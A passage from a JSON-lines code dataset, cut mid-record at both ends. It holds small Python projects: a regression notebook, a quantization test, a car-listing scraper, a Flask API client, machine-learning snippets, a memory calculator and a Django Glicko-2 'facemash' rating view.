"call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "12441036076", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Tanya Aggarwal\n# \n# # GRIP JUNE'22\n\n# # Prediction of student's study hours by linear regression\n# \n\n# # LINEAR REGRESSION:- \n# Linear regression analysis is used to predict the value of a variable based on the value of another variable. The variable you want to predict is called the dependent variable. The variable you are using to predict the other variable's value is called the independent variable.\n# \n# #simple linear regression:- In this task we will predict the percentage of marks that a student is expected to score based upon the number of hours they studies.\n# \n# As only two variables are involved i.e 1 dependent and 1 independent variable ,this is Simple linear regresion\n# \n# \n\n# In[2]:\n\n\n#importing Libraries\nimport pandas as pd #for manipulationg and analyse the data\nimport numpy as np #for numerical data\nimport matplotlib.pyplot as plt #for plotting the data\n#%matplotlib inline # for inline plotting(below the commands)\n\n\n# In[3]:\n\n\n#Importing Data\nurl='https://raw.githubusercontent.com/AdiPersonalWorks/Random/master/student_scores%20-%20student_scores.csv'\ndf1=pd.read_csv(url) #to read the data \nprint(\"Data imported successfully\")\nprint(df1)\n\n\n# In[4]:\n\n\n#if we want to print the limited values\ndf1.head(2) #to get upper values\ndf1.tail(2) #to get below values\n\n\n# In[5]:\n\n\n#Plotting the distribution of scores\ndf1.plot(x='Hours', y='Scores',style='o') #ploptting(we can change style *,1)\nplt.title('Hours vs Percentage') #title of graph\nplt.xlabel('Hours Studied') #label x axis\nplt.ylabel('Percentage Score') #label y axis\nplt.show()\n\n\n# In[6]:\n\n\n#As we can see the above graph, we can conclude that as hours studied increases ,percentafe increases. So, we can say that \n#there's a positive linear relation between two variables\n\n\n# # Preparing the data\n\n# In[7]:\n\n\n#Step-1:-In the next step we're going to divide data into \"attributes\"(inputs) and\"labels\"(Outputs)\n#Independent and Deoendent features\nx=df1.iloc[:,:-1].values #iloc() function enables us to select a particular cell of the dataset\n#print(x)\ny=df1.iloc[:,-1].values \nprint(y)\n\n\n# In[9]:\n\n\n#step 2-Split the data into training and testing sets by Using Scikit -learn's built in train_test_split()method\n# train_test_split is a function in Sklearn model selection for splitting data arrays into two subsets:\n#for training data and for testing data. With this function, you don't need to divide the dataset manually.\n#By default, Sklearn train_test_split will make random partitions for the two subsets\n\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0) #,test_size=0.2=20% for testing\n\n\n# # Training the Algorithm\n# \n\n# In[10]:\n\n\n#step-3:- Train the Algorithm\n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"Training Done\")\n\n\n# In[11]:\n\n\n#step 4:- Plotting the training line\nline = regressor.coef_*x+regressor.intercept_\n\n#Plotting the test data\nplt.scatter(x,y)\nplt.plot(x,line);\nplt.show()\n\n\n# # Prediction\n\n# In[12]:\n\n\nprint(x_test) #testing data in hours\ny_pred=regressor.predict(x_test) #predicting the scores\nprint(y_pred)\n\n\n# In[13]:\n\n\n#Comparing Actual Vs prediction\ndf2=pd.DataFrame({'Actual': y_test,'Predicted': y_pred})\ndf2\n\n\n# In[14]:\n\n\n#Checking own data\nhours=9.25\nown_pred=regressor.predict([[hours]])\nprint('Predicted score if student study 9.25 hours/day')\nprint('No. of hours={}'.format(hours))\nprint('Predicted Score={}'.format(own_pred[0]))\n\n\n# In[15]:\n\n\nfrom sklearn import metrics\nprint('Mean Absolute Error:',metrics.mean_absolute_error(y_test,y_pred))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "tanya99aggarwal/The-Sparks-Foundation-Internship", "sub_path": "GRIPJUNE'22 (Task -1).py", "file_name": "GRIPJUNE'22 (Task -1).py", "file_ext": "py", "file_size_in_byte": 3895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}]} +{"seq_id": "72077476647", "text": "import pytest\nimport torch\nimport numpy as np\nimport sys\n\nfrom .common_lib import (\n check_diff,\n check_diff_quantize,\n all_encodings\n)\n\nfrom mx.formats import _get_format_params\nfrom mx.mx_ops import _quantize_mx\n\nnp.random.seed(0xd10)\n\nDEVICE__CUSTOM_CUDA = [\n (\"cpu\", False),\n (\"cpu\", True),\n (\"cuda\", True),\n]\n\nELEM_FMTS = [\n (\"fp8_e5m2\"),\n (\"fp8_e4m3\"),\n (\"fp6_e3m2\"),\n (\"fp6_e2m3\"),\n (\"fp4_e2m1\"),\n (\"int4\"),\n]\n\n\n@pytest.mark.parametrize(\"scale_bits\", (8,5))\n@pytest.mark.parametrize(\"elem_format\", ELEM_FMTS)\n@pytest.mark.parametrize(\"block_size\", (8, 9, 64))\n@pytest.mark.parametrize(\"round\", ('nearest', 'floor', 'even'))\n@pytest.mark.parametrize(\"flush_fp32_subnorms\", (False,True))\n@pytest.mark.parametrize(\"device, custom_cuda\", DEVICE__CUSTOM_CUDA)\ndef test_mx_encoding(scale_bits, elem_format, block_size, round,\n flush_fp32_subnorms, device, custom_cuda):\n\n x1 = all_encodings(8, 9, device=\"cpu\")\n x2 = x1.clone().detach().to(device)\n\n y1 = _quantize_mx(x1, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=False)\n\n\n y2 = _quantize_mx(x2, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=custom_cuda)\n\n check_diff_quantize(x1, y1, y2)\n", "repo_name": "microsoft/microxcaling", "sub_path": "mx/tests/test_quantize_mx.py", "file_name": "test_quantize_mx.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "common_lib.all_encodings", "line_number": 42, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 45, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 53, "usage_type": "call"}, {"api_name": "common_lib.check_diff_quantize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}]} +{"seq_id": "15775683815", "text": "from bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://www.mobile.bg/pcgi/mobile.cgi?act=3&slink=rxes3n&f1=1'\nhtml_sc = requests.get(url).text\nsoup = BeautifulSoup(html_sc, 'html5lib')\nmock_budget = 10000\n\ndef year_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '')\n return int(string[:4])\n\n\ndef price_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '') \n try:\n return int(string)\n except ValueError:\n return 0 \n\nnum_page = soup.find_all('a', class_ = 'pageNumbers')\npages_links = []\npages_links.append(url)\n\nfor index, i in enumerate(num_page):\n i = num_page[index]['href'] \n i = 'https:' + i\n if i not in pages_links:\n pages_links.append(i)\n\ncounter = 1\n\nfor link in pages_links:\n url = link\n page_url = requests.get(url).text\n page_soup = BeautifulSoup(page_url, 'html5lib')\n all_listings_per_page = page_soup.find_all('table', class_ = 'tablereset', style='width:660px; margin-bottom:0px; border-top:#008FC6 1px solid;')\n page_info = page_soup.find('span', class_ = 'pageNumbersInfo').text\n\n for listing in all_listings_per_page:\n urll = listing.find('td', class_ = 'valgtop', style = 'width:162px;height:40px;padding-left:4px').a\n linkk = 'https:' + urll['href']\n title = urll.text\n price = listing.find('td', class_ = 'algright valgtop', style = 'width:135px;height:40px;padding-left:4px').span.text\n production_year = listing.find('td', style = 'width:440px;height:50px;padding-left:4px').text\n\n price = price_popper(price)\n production_year = year_popper(production_year)\n print(\"Listing: \", counter, \" \", production_year, title, price)\n counter+=1\n\n # if E30\n if production_year in range(1982, 1995):\n if price <= mock_budget:\n with open('e30-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n with open('dream-car-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n # if E36 \n elif production_year in range(1996, 2000):\n if '316' in title or '1.6' in title:\n continue\n elif price <= mock_budget:\n with open('e36-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n continue\n", "repo_name": "jr94242/bs4-scraper", "sub_path": "mobile-e36.py", "file_name": "mobile-e36.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "17858569692", "text": "import requests\nfrom werkzeug.wrappers import response\nfrom flask import session\nfrom . import Schedule_API_URL\n\n\nclass ScheduleClient:\n @staticmethod\n def get_schedules():\n #header = {'Authorization': session['user_api_key']}\n response = requests.get(Schedule_API_URL +\n '/api/schedule/all') #headers=header)\n return response.json()\n\n @staticmethod\n def create_schedule(form):\n #header = {'Authorization': session['user_api_key']}\n payload = {\n 'name': form.name.data,\n 'state': form.state.data,\n 'city': form.city.data,\n 'vaccination_cite': form.vaccination_cite.data,\n 'first_slot': form.first_slot.data,\n 'second_slot': form.second_slot.data,\n 'medical_condition': form.medical_condition.data,\n }\n\n response = requests.post(Schedule_API_URL + '/api/schedule/create',\n data=payload) #headers=header)\n return response.json()\n\n @staticmethod\n def get_schedule_from_session():\n default_schedule = {\n 'items': {}\n }\n return session.get('schedule', default_schedule)\n", "repo_name": "biallenchanuow/CSCI927", "sub_path": "vaccine/frontend/api/schedule_api.py", "file_name": "schedule_api.py", "file_ext": "py", "file_size_in_byte": 1211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "werkzeug.wrappers.response", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 13, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 13, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.response", "line_number": 28, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 30, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "8758506778", "text": "# Hazır kodlar \r\n\r\n# KARAR AGACI YAPISI \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\ndt = DecisionTreeRegressor(random_state=0)\r\ndt.fit(egitimx,egitimy)\r\n\r\ntahmin = dt .predict(testx)\r\n\r\nprint(\"KARAR AGACI R2 DEGERİ\")\r\nprint(r2_score(testy , tahmin))\r\n\r\n\r\n\r\n#RANDOM FOREST REGRESSİON\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nrf_reg = RandomForestRegressor(n_estimators=10, random_state=0)\r\nrf_reg.fit(X, y)\r\ntahmin= rf_reg.predict(X)\r\nprint(\"RASSAL ORMAN R2 DEGERİ\")\r\nprint(r2_score(testy,tahmin))\r\n\r\n#POLİNOM REGRESYON\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2) #degree degeri polinomun kaçıncı dereceden olacagını belirler \r\nx_poly = poly_reg.fit(trainx)\r\npoli = LinearRegression()\r\npoli.fit(x_poly,trainy)\r\ntahmin = poli.predict(poly_reg.fit_transform(testx))\r\nprint(\"POLİNOM REGRESYON R2 DEGERİ\")\r\nprint(r2_score(testy,poli.predict(poly_reg.fit_transform(testx))))\r\n\r\n\r\n#ÇAPRAZ DOGRULAMA \r\n\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nkvs =cross_val_score(dt, trainx, trainy,cv=5)\r\nprint(\"ÇAPRAZ DOGRULAMA R2 SCORE\")\r\nprint(kvs)\r\nprint(np.mean(kvs))\r\n", "repo_name": "BeytullahArslann/Machine-Learning", "sub_path": "Hazır kodlar.py", "file_name": "Hazır kodlar.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_val_score", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "70398535847", "text": "import sys, json, argparse\n\nDEBUG = False\n\ndef get_theta(buffers_volumes, buffer_index, _3d_index, O, B):\n T = list()\n Cs = list()\n for dim in range(len(buffers_volumes[buffer_index].p1)):\n if B[dim] < O[dim]:\n C = 0 \n else: \n C = ((_3d_index[dim]+1) * B[dim]) % O[dim]\n # print(f'{((_3d_index[dim]+1) * B[dim])}mod{O[dim]} = {C}')\n if C == 0 and B[dim] != O[dim]: # particular case \n C = O[dim]\n\n if C < 0:\n raise ValueError(\"modulo should not return negative value\")\n\n Cs.append(C)\n T.append(B[dim] - C) \n \n if DEBUG: \n print(f'\\nProcessing buffer {buffer_index}')\n print(f'C: {Cs}')\n print(f'theta: {T}')\n\n return T, Cs\n \n\ndef get_arguments():\n \"\"\" Get arguments from console command.\n \"\"\"\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument('config_filepath', \n action='store', \n type=str, \n help='Path to configuration file containing paths of third parties libraries, projects, data directories, etc. See README for more information.')\n return parser.parse_args()\n\n\ndef custom_imports(paths):\n def isempty(s):\n if s == \"\":\n return True \n return False \n\n for k, path in paths.items():\n if \"lib_\" in k and not isempty(path):\n sys.path.insert(0, path)\n\n\nif __name__ == \"__main__\":\n\n args = get_arguments()\n with open(args.config_filepath) as f:\n paths = json.load(f)\n custom_imports(paths)\n\n cases = [\n {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [650,500,500],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [650,500,700],\n \"B\": [390,600,700],\n \"volumestokeep\": [1,2,3]\n }, {\n \"type\": 2,\n \"R\": [3900,3000,3500],\n \"I\": [390,300,350],\n \"O\": [325,250,250],\n \"B\": [195,300,350],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,700],\n \"B\": [390,3000,700],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [780,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [780,600,700],\n \"O\": [3900,3000,3500],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n },\n {\n \"type\": 3,\n \"R\": [3900,3000,3500],\n \"I\": [3900,3000,3500],\n \"O\": [780,600,700],\n \"B\": [390,3000,3500],\n \"volumestokeep\": [1,2,3]\n }\n ]\n\n import dask_io\n from dask_io.optimizer.utils.utils import numeric_to_3d_pos\n from dask_io.optimizer.cases.resplit_utils import get_named_volumes, get_blocks_shape\n\n import logging\n import logging.config\n logging.config.dictConfig({\n 'version': 1,\n 'disable_existing_loggers': True,\n })\n\n for case in cases:\n _type, R, O, I, B, volumestokeep = int(case[\"type\"]), tuple(case[\"R\"]), tuple(case[\"O\"]), tuple(case[\"I\"]), tuple(case[\"B\"]), case[\"volumestokeep\"]\n print(f'Current run ------ \\nType: {_type}\\nR: {R},\\nO: {O},\\nI: {I}\\nvolumestokeep: {volumestokeep}')\n\n buffers_partition = get_blocks_shape(R, B)\n buffers_volumes = get_named_volumes(buffers_partition, B)\n\n # find omega and theta max\n omega_max = [0,0,0]\n T_max = [0,0,0]\n for buffer_index in buffers_volumes.keys():\n _3d_index = numeric_to_3d_pos(buffer_index, buffers_partition, order='F')\n T, Cs = get_theta(buffers_volumes, buffer_index, _3d_index, O, B)\n\n for i in range(3):\n if Cs[i] > omega_max[i]:\n omega_max[i] = Cs[i]\n if T[i] > T_max[i]:\n T_max[i] = T[i]\n\n print(\"Omega max: \", omega_max)\n\n nb_bytes_per_voxel = 2\n buffersize = B[0]*B[1]*B[2]\n n = R[2]/B[2]\n N = R[1]/B[1] * R[2]/B[2]\n\n i, j, k = 0, 1, 2\n F1 = omega_max[k] * min(B[j],T_max[j]) * min(B[i],T_max[i])\n F2 = T_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j])) * min(B[i], T_max[i])\n F3 = omega_max[k] * max(0, min(B[j] - T_max[j] , omega_max[j] )) * min(B[i] , T_max[i] )\n F4 = T_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F5 = omega_max[k] * T_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F6 = T_max[k] * omega_max[1] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n F7 = omega_max[k] * omega_max[j] * max(0, min(B[i] - T_max[i] , omega_max[i] ))\n\n print('F1:', F1)\n print('F2:', F2)\n print('F3:', F3)\n print('F4:', F4)\n print('F5:', F5)\n print('F6:', F6)\n print('F7:', F7)\n\n print('buffer size: ', buffersize*nb_bytes_per_voxel/1000000000, \"GB\")\n max_mem = (F1 + n*(F2 + F3) + N*(F4 + F5 + F6 + F7) + buffersize) * nb_bytes_per_voxel\n print(\"max_mem: \", max_mem/1000000000, \"GB\")", "repo_name": "GTimothee/dask_io_experiments", "sub_path": "dask_io_experiments/experiment_5/mem_calculator.py", "file_name": "mem_calculator.py", "file_ext": "py", "file_size_in_byte": 5490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.config.dictConfig", "line_number": 123, "usage_type": "call"}, {"api_name": "logging.config", "line_number": 123, "usage_type": "attribute"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_blocks_shape", "line_number": 132, "usage_type": "call"}, {"api_name": "dask_io.optimizer.cases.resplit_utils.get_named_volumes", "line_number": 133, "usage_type": "call"}, {"api_name": "dask_io.optimizer.utils.utils.numeric_to_3d_pos", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "25303634227", "text": "import random\nimport math\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom facemash.models import FaceMash\n\n\ndef play(request):\n \"\"\" The main-page view of facemash app. \"\"\"\n try:\n contestants = FaceMash.objects.all()\n contestant_1 = random.choice(contestants)\n contestant_2 = random.choice(contestants)\n # A while loop to ensure that the contestants aren't same.\n while contestant_1 == contestant_2:\n contestant_2 = random.choice(contestants)\n args = {'contestant_1': contestant_1, 'contestant_2': contestant_2}\n except IndexError:\n error = True\n args = {'error': error}\n return render(request, 'facemash.html', args) \n\ndef ratings_calculator(request, winner_id, loser_id):\n \"\"\"\n This view is the HEART of facemash app. This is where all the calculations\n for the ratings are done. This is where the algorithm is.\n \"\"\"\n try:\n winner = FaceMash.objects.get(id=winner_id)\n loser = FaceMash.objects.get(id=loser_id)\n w = winner\n l = loser\n\n TAU = 0.5 # System constant\n # score = s\n s_w = 1.0\n s_l = 0.0\n # mu\n mu_w = (w.ratings - 1500.0)/173.7178\n mu_l = (l.ratings - 1500.0)/173.7178\n # phi\n phi_w = w.rd/173.7178\n phi_l = l.rd/173.7178\n # g(phi) = g\n g_w = 1.0/math.sqrt(1.0 + 3.0*pow(phi_w, 2)/pow(math.pi, 2))\n g_l = 1.0/math.sqrt(1.0 + 3.0*pow(phi_l, 2)/pow(math.pi, 2))\n # E = E\n E_w = 1.0/(1.0 + math.exp(-g_w*(mu_w - mu_l)))\n E_l = 1.0/(1.0 + math.exp(-g_l*(mu_l - mu_w)))\n # nu\n nu_w = 1.0/(pow(g_l, 2)*E_w*(1 - E_w))\n nu_l = 1.0/(pow(g_w, 2)*E_l*(1 - E_l))\n # delta = delta\n delta_w = nu_w*g_l*(s_w - E_w) # s_w = 1\n delta_l = nu_l*g_w*(s_l - E_l) # s_l = 0\n # a = a\n a_w = math.log(pow(w.sigma, 2), math.e)\n a_l = math.log(pow(l.sigma, 2), math.e)\n\n # f(x) = function_x\n def function_x(x, delta, phi, nu, a):\n \"\"\"\n This function corresponds to f(x) in Glicko-2 Algorithm.\n \"\"\"\n\n e_x = math.exp(x)\n multi = pow(delta, 2) - pow(phi, 2) - nu - math.exp(x)\n divi = 2.0*pow((phi+nu+e_x), 2)\n minus = (x-a)/pow(TAU, 2)\n result = e_x*multi/divi - minus\n return result\n\n EPSILON = 0.000001 # Convergence tolerance\n # Calculate for w (winner).\n A_w = a_w\n if pow(delta_w, 2) > (pow(phi_w, 2) + nu_w):\n B_w = math.log((pow(delta_w, 2) - pow(phi_w, 2) - nu_w), math.e)\n else:\n k = 1\n x = a_w - k*TAU\n f_x = function_x(x, delta_w, phi_w, nu_w, a_w)\n while f_x < 0:\n k += 1\n x = a_w - k*TAU\n function_x(x, delta_w, phi_w, nu_w, a_w)\n B_w = a_w - k*TAU\n\n # find f(A_w)\n f_A_w = function_x(A_w, delta_w, phi_w, nu_w, a_w)\n # find f(B_w)\n f_B_w = function_x(B_w, delta_w, phi_w, nu_w, a_w)\n\n while abs(B_w - A_w) > EPSILON:\n C_w = A_w + (A_w-B_w)*f_A_w/(f_B_w-f_A_w)\n # find f(C_w)\n f_C_w = function_x(C_w, delta_w, phi_w, nu_w, a_w)\n if f_C_w*f_B_w < 0:\n A_w = B_w\n f_A_w = f_B_w\n else:\n f_A_w = f_A_w/2.0\n B_w = C_w\n f_B_w = f_C_w\n # sigmama-dash = sigma_2\n sigma_2_w = math.exp(A_w/2.0)\n # phi-star = p_s\n p_s_w = math.sqrt(pow(phi_w, 2)+pow(sigma_2_w, 2))\n # calculate for l (loser)\n A_l = a_l\n if pow(delta_l, 2) > (pow(phi_l, 2) + nu_l):\n B_l = math.log((pow(delta_l, 2) - pow(phi_l, 2) - nu_l), math.e)\n else:\n k = 1\n x = a_l - k*TAU\n f_x = function_x(x, delta_l, phi_l, nu_l, a_l)\n while f_x < 0:\n k += 1\n x = a_l - k*TAU\n function_x(x, delta_l, phi_l, nu_l, a_l)\n B_l = a_l - k*TAU\n # find f(A_l)\n f_A_l = function_x(A_l, delta_l, phi_l, nu_l, a_l)\n # find f(B_l)\n f_B_l = function_x(B_l, delta_l, phi_l, nu_l, a_l)\n while abs(B_l - A_l) > EPSILON:\n C_l = A_l + (A_l-B_l)*f_A_l/(f_B_l-f_A_l)\n # find f(C_l)\n f_C_l = function_x(C_l, delta_l, phi_l, nu_l, a_l)\n if f_C_l*f_B_l < 0:\n A_l = B_l\n f_A_l = f_B_l\n else:\n f_A_l = f_A_l/2.0\n B_l = C_l\n f_B_l = f_C_l\n # sigmama-dash = sigma_2\n sigma_2_l = math.exp(A_l/2.0)\n # phi-star = p_s\n p_s_l = math.sqrt(pow(phi_l, 2)+pow(sigma_2_l, 2))\n # phi-dash = p_2\n p_2_w = 1.0/math.sqrt(1.0/pow(p_s_w, 2) + 1.0/nu_w)\n p_2_l = 1.0/math.sqrt(1.0/pow(p_s_l, 2) + 1.0/nu_l)\n # mu-dash = u_2\n u_2_w = mu_w + pow(p_s_w, 2)*g_l*(s_w - E_w)\n u_2_l = mu_l + pow(p_s_l, 2)*g_w*(s_l - E_l)\n # convert back to orignial ratings\n w.ratings = 173.7178*u_2_w + 1500\n w.sigma = sigma_2_w\n l.ratings = 173.7178*u_2_l + 1500\n l.sigma = sigma_2_l\n\n # As pointed out by the author of Glicko-2, rd (rating deviation)\n # should not go below 30.\n # Therefore, below make a check for that.\n\n w.rd = 173.7178*p_2_w # New rd of winner\n if w.rd < 30:\n w.rd = 30\n l.rd = 173.7178*p_2_l # New rd of loser\n if l.rd < 30:\n l.rd = 30\n # Save the new ratings, rd and volatality for both winner and loser.\n w.save()\n l.save()\n # Redirect back to the Play page\n return HttpResponseRedirect('/facemash/')\n except FaceMash.DoesNotExist:\n raise Http404\n\n\ndef ratings_page(request):\n \"\"\" The ratings-page view. \"\"\"\n\n faces = FaceMash.objects.all().order_by('-ratings')\n return render(request, \"ratings_page.html\", {'faces' : faces})\n\n", "repo_name": "bhch/django-facemash", "sub_path": "facemash/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6048, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": 